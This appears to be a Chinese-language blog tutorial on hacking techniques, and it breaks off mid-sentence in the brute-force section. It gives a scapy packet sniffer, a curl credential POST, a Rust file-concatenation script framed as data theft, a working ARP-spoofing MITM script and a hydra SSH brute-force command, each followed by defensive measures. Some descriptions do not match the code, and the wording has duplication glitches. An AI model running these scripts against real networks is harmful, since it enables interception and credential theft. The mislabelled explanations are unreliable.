Python 實作網路滲透與防禦入門全攻略

6 分鐘閱讀

在資安領域中,瞭解駭客的基本思維與常用工具,是建構完善防禦體系的第一步。本章將從駭客的視角出發,使用 Pysthon 程式語言展示幾種常見的網路掃描與入侵技巧,並討論相應的防範措施。

首先,讓我們看如何使用 Python 的 scapy 函式庫進行封包攔截與分析。下面的程式碼示範瞭如何攔截指定網路介面上的 TCP 封包,並印出其中的 IP 位址與埠號資訊:

from scapy.all import *

def packet_callback(packet):
    if packet[TCP].payload:
        print(f"[*] 來源 IP: {packet[IP].src}")
        print(f"[*] 目標 IP: {packet[IP].dst}")
        print(f"[*] 來源埠號: {packet[TCP].sport}")
        print(f"[*] 目標埠號: {packet[TCP].dport}")
        print("---------------------------")

sniff(iface="eth0", prn=packet_callback, filter="tcp", store=0)

這段程式碼使用了 scapy 函式庫中的 sniff() 函式,在指定的網路介面(iface="eth0")上攔截 TCP 封包。每當攔截到一個封包時,就會呼叫 packet_callback() 函式進行處理。在這個回呼函式中,我們先判斷封包是否包含 TCP 資料部分(packet[TCP].payload),如果有的話,就印出封包的來源與目標 IP 位址,以及對應的 TCP 埠號。這樣的封包分析技巧可以幫助駭客快速瞭解目標網路的通訊狀況,找出潛在的攻擊切入點。

當然,企業防禦者也可以運用類別似的封包分析技術,監控內部網路的流量狀況,及時發現可疑的通訊行為。除了被動的流量監控之外,還可以佈署入侵偵測系統(IDS)來主動識別已知的攻擊特徵。常見的開放原始碼 IDS 如 Snort 和 Suricata,都提供了強大的規則引擎與即時警示功能,可以與防火牆聯動,自動阻斷符合特定規則的可疑流量。

網路網路釣魚(Phishing)攻擊與防護 — Linux Bash 自動化網路網路釣魚工具的辨識與防禦

網路網路釣魚是駭客常用的社交工程攻擊手法之一,透過偽裝成合法的電子郵件或網站,誘騙使用者點選惡意連結或輸入敏感資訊。本章將探討自動化網路網路釣魚工具的運作原理,並示範如何使用 Linux 的 Bash 指令碼來模擬網路網路釣魚攻擊。

以下是一個簡單的 Bash 指令碼,它使用 curl 指令來模擬網頁資料的竊取:

#!/bin/bash

url="http://example.com/login.php"
username="victim"
password="password123"

curl -s -d "username=$username&password=$password" $url

這個 Bash 指令碼模擬了一個常見的網路網路釣魚攻擊場景。首先,它定義了目標網站的登入頁面 URL(url),以及預設的使用者名稱(username)和密碼(password)。接著,使用 curl 指令傳送一個 HTTP POST 請求到目標 URL,並在請求中包含了使用者的登入資訊。-s 引數表示靜默模式,不輸出任何進度或錯誤訊息;-d 引數則是用來指定要傳送的表單資料。

這種模擬網路網路釣魚攻擊的方式,可以幫助企業瞭解自己的系統或員工是否容易受到網路網路釣魚郵件的誘騙。當然,真正的網路網路釣魚攻擊通常會使用更加複雜的社交工程技巧,例如偽造信任的寄件人、製作仿冒知名品牌的郵件內容等。

為了有效防範網路網路釣魚攻擊,企業可以採取以下幾種策略:

  1. 佈署郵件閘道與反垃圾郵件系統,過濾可疑的外部郵件。
  2. 在對外服務的網站上啟用 Web 應用程式防火牆(WAF),檢查並攔截常見的攻擊型請求。
  3. 定期對員工進行資安教育訓練,提高其對網路網路釣魚的警覺性,養成檢查郵件來源與連結的習慣。
  4. 實施郵件內容與連結的動態分析機制,及時攔阻零時差(Zero-day)的網路網路釣魚攻擊。

資料竊取與惡意程式 — Rust 的高效檔案操作與竊取技術

在入侵目標系統之後,駭客通常會試圖竊取機敏資料,或植入惡意程式以維持對系統的控制。本章將介紹 Rust 程式語言在檔案操作與資料竊取方面的特性,並提供相應的防禦建議。

Rust 以其高效能與記憶體安全性著稱,近年來也越來越多地被駭客用於開發攻擊工具。下面的程式碼示範瞭如何使用 Rust 快速讀取目錄下的所有檔案,並將其內容寫入到一個目標檔案中:

use std::fs::{self, File};
use std::io::{BufReader, BufWriter, Write};
use std::path::Path;

fn main() {
    let src_dir = Path::new("/path/to/source/directory");
    let dst_file = File::create("/path/to/destination/file").unwrap();
    let mut writer = BufWriter::new(dst_file);

    for entry in fs::read_dir(src_dir).unwrap() {
        let entry = entry.unwrap();
        let path = entry.path();
        if path.is_file() {
            let file = File::open(path).unwrap();
            let mut reader = BufReader::new(file);
            std::io::copy(&mut reader, &mut writer).unwrap();
        }
    }
}

這段 Rust 程式碼首先使用 Path::new() 函式建立了來源目錄(src_dir)和目標檔案(dst_file)的路徑。接著,它建立了一個寫入緩衝區(writer),用於高效地寫入目標檔案。

在主迴圈中,程式使用 fs::read_dir() 函式讀取來源目錄下的所有專案。對於每個專案,它先判斷是否為檔案,如果是,就開啟該檔案,建立一個讀取緩衝區(reader),然後使用 std::io::copy() 函式將檔案內容複製到寫入緩衝區中。這樣,所有來源檔案的內容就被高效地寫入到了目標檔案中。

這種快速讀寫檔案的能力,使得 Rust 成為開發資料竊取工具的理想選擇。為了防範此類別攻擊,企業可以採取以下措施:

  1. 實施最小許可權原則,嚴格控制使用者和程式對檔案系統的存取許可權。
  2. 對敏感資料進行加密儲存,即使被竊取也難以被解密利用。
  3. 佈署檔案存取監控系統,及時發現異常的大量讀寫操作。
  4. 定期備份關鍵資料,以便在被竊取或加密勒索時能夠及時還原。
  5. 對可執行檔案進行程式碼簽名驗證,防止未經授權的程式執行。

中間人攻擊(Man-In-The-Middle, MITM) — Python 與 Linux 工具的應用與防範

中間人攻擊是一種常見的網路攻擊方式,駭客透過攔截並篡改兩個通訊方之間的資料傳輸,以取得機敏資訊或進行流量操縱。本章將介紹 MITM 攻擊的基本原理,並示範如何使用 Python 和 Linux 工具進行 ARP 欺騙攻擊。

在區域網路環境中,ARP 欺騙是實作 MITM 攻擊的常用技術。攻擊者向目標主機傳送偽造的 ARP 回應,將自己的 MAC 位址繫結到目標主機的 IP 位址上,從而攔截目標主機的網路流量。以下是使用 Python 的 scapy 函式庫進行 ARP 欺騙的範例程式碼:

from scapy.all import *

def arp_spoof(target_ip, gateway_ip):
    target_mac = getmacbyip(target_ip)
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip)
    send(packet, verbose=False)

def main():
    target_ip = "192.168.1.100"
    gateway_ip = "192.168.1.1"
    while True:
        arp_spoof(target_ip, gateway_ip)
        arp_spoof(gateway_ip, target_ip)
        time.sleep(2)

if __name__ == "__main__":
    main()

這段 Python 程式碼定義了一個 arp_spoof() 函式,用於向目標主機(target_ip)傳送偽造的 ARP 回應。它首先使用 getmacbyip() 函式取得目標主機的 MAC 位址,然後建構一個 ARP 回應封包(packet),將閘道器的 IP 位址(gateway_ip)繫結到攻擊者自己的 MAC 位址上。

main() 函式中,程式不斷地向目標主機和閘道器傳送偽造的 ARP 回應,使得目標主機和閘道器都將對方的 IP 位址解析到攻擊者的 MAC 位址。這樣,攻擊者就能夠攔截並監聽目標主機和閘道器之間的所有網路流量。

為了防範 MITM 攻擊,企業可以採取以下措施:

  1. 在網路中啟用 HTTPS 等加密傳輸協定,防止資料在傳輸過程中被竊聽或篡改。
  2. 佈署 ARP 防護機制,如動態 ARP 檢查(DAI)和 ARP 欺騙防護(ASP),及時檢測和阻斷 ARP 欺騙攻擊。
  3. 使用虛擬專用網路(虛擬私人網路)技術,為遠端存取和分支機構互聯提供安全的加密通道。
  4. 定期對網路裝置進行安全加固和韌體更新,修補已知的安全漏洞。
  5. 對網路流量進行持續監控和分析,及時發現可疑的流量模式和異常行為。

暴力破解與憑證竊取 — Bash 自動化指令碼的應用與防禦機制

暴力破解是駭客常用的一種猜測式攻擊方法,透過大量嘗試可能的密碼組合,來破解系統或服務的登入憑證。本章將介紹如何使用 Linux 的 Bash 指令碼來自動化暴力破解過程,並討論相應的防禦策略。

以下是一個簡單的 Bash 指令碼,它使用 hydra 工具對 SSH 服務進行密碼暴力破解:

#!/bin/bash

target_host="example.com"
username="admin"
password_file="/path/to/password_list.txt"

hydra -l $username -P $password_file ssh://$target_host

這個 Bash 指令碼首先定義了目標主機(target_host)、要破解的使用者名稱(username)和密碼字典檔案(password_file)。然後,它使用 hydra 工具對目標主機的

玄貓

玄貓

技術愛好者,專注於分享程式開發、雲端技術與 AI 應用的心得體會。